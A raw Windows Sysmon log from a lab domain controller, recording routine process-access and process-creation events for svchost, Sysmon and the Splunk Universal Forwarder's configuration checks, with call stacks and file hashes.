12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-647F-6064-5200-00000000AE01}37443748C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.971{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.955{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.964{266CAFBE-647F-6064-5200-00000000AE01}3744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.908{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.908{266CAFBE-647F-6064-5100-00000000AE01}40003996C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.658{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5100-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.645{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 